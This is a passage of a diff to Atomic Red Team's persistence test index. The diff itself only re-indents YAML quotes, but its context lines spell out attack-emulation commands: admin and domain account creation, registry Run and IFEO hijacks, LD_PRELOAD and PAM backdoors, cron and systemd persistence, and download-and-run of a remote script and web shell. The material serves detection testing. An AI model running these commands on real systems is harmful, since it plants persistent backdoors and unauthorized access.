-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -45892,10 +45892,10 @@ persistence:
executor:
command: 'assoc #{extension_to_change}=#{target_extension_handler}
-'
+ '
cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler}
-'
+ '
name: command_prompt
elevation_required: true
T1136.003:
@@ -45965,7 +45965,7 @@ persistence:
activity do not interupt the normal functions of the compromised users and
can remain undetected for a long time
-'
+ '
supported_platforms:
- iaas:aws
input_arguments:
@@ -45976,21 +45976,21 @@ persistence:
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
-'
+ '
prereq_command: 'cat ~/.aws/credentials | grep "default"
-'
+ '
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
-'
+ '
executor:
command: 'aws iam create-user --user-name #{username}
-'
+ '
cleanup_command: 'aws iam delete-user --user-name #{username}
-'
+ '
name: sh
elevation_required: false
T1078.004:
@@ -46059,7 +46059,7 @@ persistence:
description: 'GCP Service Accounts can be used to gain intial access as well
as maintain persistence inside Google Cloud.
-'
+ '
supported_platforms:
- google-workspace
- windows
@@ -46094,20 +46094,20 @@ persistence:
cleanup_command: 'gcloud iam service-accounts delete #{service-account-email}
--quiet
-'
+ '
dependency_executor_name: gcloud
dependencies:
- description: 'Requires gcloud
-'
+ '
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
-'
+ '
T1542.002:
technique:
type: attack-pattern
@@ -46293,7 +46293,7 @@ persistence:
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
cleanup_command: 'Get-Process -Name "*calc" | Stop-Process
-'
+ '
name: powershell
T1554:
technique:
@@ -46402,7 +46402,7 @@ persistence:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -46413,17 +46413,17 @@ persistence:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get cronjobs -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: CreateCronjob
@@ -46435,7 +46435,7 @@ persistence:
CronJob for scheduling execution of malicious code that would run as a container
in the cluster.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -46446,20 +46446,20 @@ persistence:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
-'
+ '
cleanup_command: 'kubectl delete cronjob art -n #{namespace}
-'
+ '
name: bash
elevation_required: false
T1136:
@@ -46649,7 +46649,7 @@ persistence:
of the referenced file. This technique was used by numerous IoT automated
exploitation attacks.
-'
+ '
supported_platforms:
- macos
- linux
@@ -46669,7 +46669,7 @@ persistence:
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
cleanup_command: 'crontab /tmp/notevil
-'
+ '
- name: Cron - Add script to all cron subfolders
auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -46677,7 +46677,7 @@ persistence:
schedule. This technique was used by the threat actor Rocke during the exploitation
of Linux web servers.
-'
+ '
supported_platforms:
- macos
- linux
@@ -46709,7 +46709,7 @@ persistence:
to execute on a schedule. This technique was used by the threat actor Rocke
during the exploitation of Linux web servers.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -46726,10 +46726,10 @@ persistence:
name: bash
command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
-'
+ '
T1574.001:
technique:
object_marking_refs:
@@ -46904,10 +46904,10 @@ persistence:
dependencies:
- description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
-'
+ '
prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -46915,7 +46915,7 @@ persistence:
command: "#{gup_executable}\n"
cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
-'
+ '
name: command_prompt
T1078.001:
technique:
@@ -47035,7 +47035,7 @@ persistence:
description: 'The Adversaries can activate the default Guest user. The guest
account is inactivated by default
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47046,10 +47046,10 @@ persistence:
executor:
command: 'net user #{guest_user} /active:yes
-'
+ '
cleanup_command: 'net user #{guest_user} /active:no
-'
+ '
name: command_prompt
elevation_required: true
T1136.002:
@@ -47101,7 +47101,7 @@ persistence:
auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62
description: 'Creates a new domain admin user in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47123,14 +47123,14 @@ persistence:
net group "#{group}" "#{username}" /add /domain
cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
-'
+ '
name: command_prompt
elevation_required: false
- name: Create a new account similar to ANONYMOUS LOGON
auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548
description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47145,10 +47145,10 @@ persistence:
executor:
command: 'net user "#{username}" "#{password}" /add /domain
-'
+ '
cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain
-'
+ '
name: command_prompt
elevation_required: false
- name: Create a new Domain Account using PowerShell
@@ -47156,7 +47156,7 @@ persistence:
description: 'Creates a new Domain User using the credentials of the Current
User
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -47185,7 +47185,7 @@ persistence:
$User
cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1"
-'
+ '
name: powershell
elevation_required: false
T1078.002:
@@ -47565,21 +47565,21 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -47604,18 +47604,18 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1546.014:
technique:
@@ -47676,7 +47676,7 @@ persistence:
description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -47988,7 +47988,7 @@ persistence:
description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension,
please see "T1133\src\list of vpn extension.txt" to view complete list
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48001,12 +48001,12 @@ persistence:
type: String
default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme"
-'
+ '
dependency_executor_name: powershell
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -48307,7 +48307,7 @@ persistence:
auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48323,19 +48323,19 @@ persistence:
command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
-'
+ '
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: IFEO Global Flags
auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
description: 'Leverage Global Flags Settings
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -48532,7 +48532,7 @@ persistence:
description: 'This test uses the insmod command to load a kernel module for
Linux.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -48556,10 +48556,10 @@ persistence:
dependencies:
- description: 'The kernel module must exist on disk at specified location
-'
+ '
prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
cp #{module_source_path}/* #{temp_folder}/
@@ -48568,7 +48568,7 @@ persistence:
executor:
command: 'sudo insmod #{module_path}
-'
+ '
cleanup_command: |
sudo rmmod #{module_name}
[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -48780,7 +48780,7 @@ persistence:
auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
description: 'Create a plist and execute it
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -48797,15 +48797,15 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -48903,7 +48903,7 @@ persistence:
auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
description: 'Utilize LaunchDaemon to launch `Hello World`
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -48920,15 +48920,15 @@ persistence:
- description: 'The shared library must exist on disk at specified location
(#{path_malicious_plist})
-'
+ '
prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
try again."; exit 1;
-'
+ '
executor:
name: bash
elevation_required: true
@@ -49089,7 +49089,7 @@ persistence:
auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2
description: 'Create a user via useradd
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -49100,17 +49100,17 @@ persistence:
executor:
command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username}
-'
+ '
cleanup_command: 'userdel #{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a user account on a MacOS system
auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2'
description: 'Creates a user on a MacOS system with dscl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -49132,7 +49132,7 @@ persistence:
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
cleanup_command: 'dscl . -delete /Users/#{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a new user in a command prompt
@@ -49154,10 +49154,10 @@ persistence:
executor:
command: 'net user /add "#{username}" "#{password}"
-'
+ '
cleanup_command: 'net user /del "#{username}" >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create a new user in PowerShell
@@ -49175,10 +49175,10 @@ persistence:
executor:
command: 'New-LocalUser -Name "#{username}" -NoPassword
-'
+ '
cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Create a new user in Linux with `root` UID and GID.
@@ -49186,7 +49186,7 @@ persistence:
description: 'Creates a new user in Linux and adds the user to the `root` group.
This technique was used by adversaries during the Butter attack campaign.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -49204,14 +49204,14 @@ persistence:
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;
cleanup_command: 'userdel #{username}
-'
+ '
name: bash
elevation_required: true
- name: Create a new Windows admin user
auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559
description: 'Creates a new admin user in a command prompt.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -49229,7 +49229,7 @@ persistence:
net localgroup administrators "#{username}" /add
cleanup_command: 'net user /del "#{username}" >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1078.003:
@@ -49477,7 +49477,7 @@ persistence:
auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
description: 'Mac logon script
-'
+ '
supported_platforms:
- macos
executor:
@@ -49706,7 +49706,7 @@ persistence:
description: 'Netsh interacts with other operating system components using dynamic-link
library (DLL) files
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -49717,7 +49717,7 @@ persistence:
executor:
command: 'netsh.exe add helper #{helper_file}
-'
+ '
name: command_prompt
T1556.004:
technique:
@@ -50086,11 +50086,11 @@ persistence:
command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
/t REG_SZ /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office
test\Special\Perf" /f >nul 2>&1
-'
+ '
name: command_prompt
T1137.003:
technique:
@@ -50225,11 +50225,11 @@ persistence:
command: 'reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
/v URL /t REG_SZ /d #{url} /f
-'
+ '
cleanup_command: 'reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder}
/v URL /f >nul 2>&1
-'
+ '
T1137.005:
technique:
object_marking_refs:
@@ -50356,7 +50356,7 @@ persistence:
description: 'Uses PowerShell to install and register a password filter DLL.
Requires a reboot and administrative privileges.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -50369,14 +50369,14 @@ persistence:
- description: 'AtomicPasswordFilter.dll must exist on disk at specified location
(#{input_dll})
-'
+ '
prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own password filter
dll"
-'
+ '
executor:
command: |
$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
@@ -50774,7 +50774,7 @@ persistence:
auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
description: 'Modify MacOS plist file in one of two directories
-'
+ '
supported_platforms:
- macos
executor:
@@ -50881,10 +50881,10 @@ persistence:
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
- name: Malicious PAM module
auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
description: |
@@ -50918,35 +50918,35 @@ persistence:
- description: 'The PAM development library must be installed to build the PAM
module
-'
+ '
prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
0; else exit 1; fi;
-'
+ '
get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
fi
-'
+ '
- description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
-'
+ '
prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
fi;
-'
+ '
get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
-'
+ '
executor:
name: sh
elevation_required: true
command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
-'
+ '
cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
-'
+ '
T1205.001:
technique:
object_marking_refs:
@@ -51079,11 +51079,11 @@ persistence:
command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
/v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
-'
+ '
cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
/f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
T1546.013:
@@ -51169,7 +51169,7 @@ persistence:
profile pofile that points to a malicious executable. Upon execution, calc.exe
will be launched.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -51185,13 +51185,13 @@ persistence:
dependencies:
- description: 'Ensure a powershell profile exists for the current user
-'
+ '
prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
-'
+ '
executor:
command: |
Add-Content #{ps_profile} -Value ""
@@ -51409,14 +51409,14 @@ persistence:
command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
World"'' >> /etc/rc.common
-'
+ '
elevation_required: true
name: bash
- name: rc.common
auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
description: 'Modify rc.common
-'
+ '
supported_platforms:
- linux
executor:
@@ -51432,12 +51432,12 @@ persistence:
];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
&& sudo rm $origfilename;fi
-'
+ '
- name: rc.local
auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
description: 'Modify rc.local
-'
+ '
supported_platforms:
- linux
executor:
@@ -51453,7 +51453,7 @@ persistence:
];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
sudo rm $origfilename;fi
-'
+ '
T1542.004:
technique:
type: attack-pattern
@@ -51579,10 +51579,10 @@ persistence:
executor:
command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
-'
+ '
cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
-'
+ '
elevation_required: true
name: sh
T1108:
@@ -51777,11 +51777,11 @@ persistence:
command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
/V "Atomic Red Team" /f >nul 2>&1
-'
+ '
name: command_prompt
- name: Reg Key RunOnce
auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -51799,11 +51799,11 @@ persistence:
command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /d "#{thing_to_execute}"
-'
+ '
cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
/v 1 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: PowerShell Registry RunOnce
@@ -51829,7 +51829,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Suspicious vbs file run from startup Folder
@@ -51943,7 +51943,7 @@ persistence:
cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell"
-Force -ErrorAction Ignore
-'
+ '
name: powershell
T1505.001:
technique:
@@ -52088,10 +52088,10 @@ persistence:
~/.ssh/authorized_keys); echo $ssh_authorized_keys > ~/.ssh/authorized_keys;
fi;
-'
+ '
cleanup_command: 'unset ssh_authorized_keys
-'
+ '
T1053.005:
technique:
type: attack-pattern
@@ -52189,7 +52189,7 @@ persistence:
description: 'Upon successful execution, cmd.exe will create a scheduled task
to spawn cmd.exe at 20:10.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52206,10 +52206,10 @@ persistence:
elevation_required: false
command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
-'
+ '
- name: Scheduled task Remote
auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
description: |
@@ -52245,11 +52245,11 @@ persistence:
command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
"Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
-'
+ '
cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
/TN "Atomic task" /F >nul 2>&1
-'
+ '
- name: Powershell Cmdlet Scheduled Task
auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
description: |
@@ -52271,7 +52271,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
>$null 2>&1
-'
+ '
- name: Task Scheduler via VBA
auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
description: |
@@ -52288,7 +52288,7 @@ persistence:
dependencies:
- description: 'Microsoft #{ms_product} must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -52299,7 +52299,7 @@ persistence:
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
-'
+ '
executor:
command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -52312,7 +52312,7 @@ persistence:
login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
as Register-ScheduledTask cmdlet behind the scenes.
-'
+ '
supported_platforms:
- windows
executor:
@@ -52324,7 +52324,7 @@ persistence:
cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
>$null 2>&1
-'
+ '
- name: Scheduled Task Executing Base64 Encoded Commands From Registry
auto_generated_guid: e895677d-4f06-49ab-91b6-ae3742d0a2ba
description: "A Base64 Encoded command will be stored in the registry (ping
@@ -52482,7 +52482,7 @@ persistence:
sets it as the screensaver so it will execute for persistence. Requires a
reboot and logon.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52797,7 +52797,7 @@ persistence:
description: 'Change Service registry ImagePath of a bengin service to a malicious
file
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -52817,22 +52817,22 @@ persistence:
dependencies:
- description: 'The service must exist (#{weak_service_name})
-'
+ '
prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
-'
+ '
executor:
command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
/f /v ImagePath /d "#{malicious_service_path}"
-'
+ '
cleanup_command: 'sc.exe delete #{weak_service_name}
-'
+ '
name: command_prompt
T1547.009:
technique:
@@ -52905,7 +52905,7 @@ persistence:
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -53006,10 +53006,10 @@ persistence:
executor:
command: 'sudo touch /Library/StartupItems/EvilStartup.plist
-'
+ '
cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
-'
+ '
name: sh
elevation_required: true
T1542.001:
@@ -53186,7 +53186,7 @@ persistence:
description: 'This test creates a Systemd service unit file and enables it as
a service.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -53259,15 +53259,15 @@ persistence:
dependencies:
- description: 'System must be Ubuntu ,Kali OR CentOS.
-'
+ '
prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
/etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
-'
+ '
get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
-'
+ '
executor:
name: bash
elevation_required: true
@@ -53424,20 +53424,20 @@ persistence:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: false
command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1''
/bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl --user stop Atomic-Red-Team.service
systemctl --user stop Atomic-Red-Team.timer
@@ -53454,20 +53454,20 @@ persistence:
dependencies:
- description: 'Check if systemd-run exists on the machine
-'
+ '
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
-'
+ '
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
-'
+ '
executor:
elevation_required: true
command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh
-c ''echo "$(date) $(whoami)" >>/tmp/log''
-'
+ '
cleanup_command: |
systemctl stop Atomic-Red-Team.service
systemctl stop Atomic-Red-Team.timer
@@ -53769,13 +53769,13 @@ persistence:
dependencies:
- description: 'Microsoft Exchange SnapIn must be installed
-'
+ '
prereq_command: 'Get-TransportAgent -TransportService FrontEnd
-'
+ '
get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn
-'
+ '
executor:
command: |
Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path}
@@ -53992,7 +53992,7 @@ persistence:
auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
description: 'Adds a command to the .bash_profile file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -54004,16 +54004,16 @@ persistence:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bash_profile
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bash_profile
-'
+ '
name: sh
- name: Add command to .bashrc
auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
description: 'Adds a command to the .bashrc file of the current user
-'
+ '
supported_platforms:
- macos
- linux
@@ -54025,10 +54025,10 @@ persistence:
executor:
command: 'echo ''#{command_to_add}'' >> ~/.bashrc
-'
+ '
cleanup_command: 'sed -i ''/#{command_to_add}/d'' ~/.bashrc
-'
+ '
name: sh
T1078:
technique:
@@ -54206,10 +54206,10 @@ persistence:
dependencies:
- description: 'Web shell must exist on disk at specified location (#{web_shells})
-'
+ '
prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
@@ -54218,7 +54218,7 @@ persistence:
executor:
command: 'xcopy /I /Y #{web_shells} #{web_shell_path}
-'
+ '
cleanup_command: |
del #{web_shell_path}\b.jsp /q >nul 2>&1
del #{web_shell_path}\tests.jsp /q >nul 2>&1
@@ -54491,10 +54491,10 @@ persistence:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -54527,10 +54527,10 @@ persistence:
dependencies:
- description: 'Service binary must exist on disk at specified location (#{binary_path})
-'
+ '
prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "#{binary_path}"
@@ -54656,11 +54656,11 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Winlogon Userinit Key Persistence - PowerShell
auto_generated_guid: fb32c935-ee2e-454b-8fa3-1c46b42e8dfb
@@ -54679,11 +54679,11 @@ persistence:
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
-'
+ '
cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows
NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore
-'
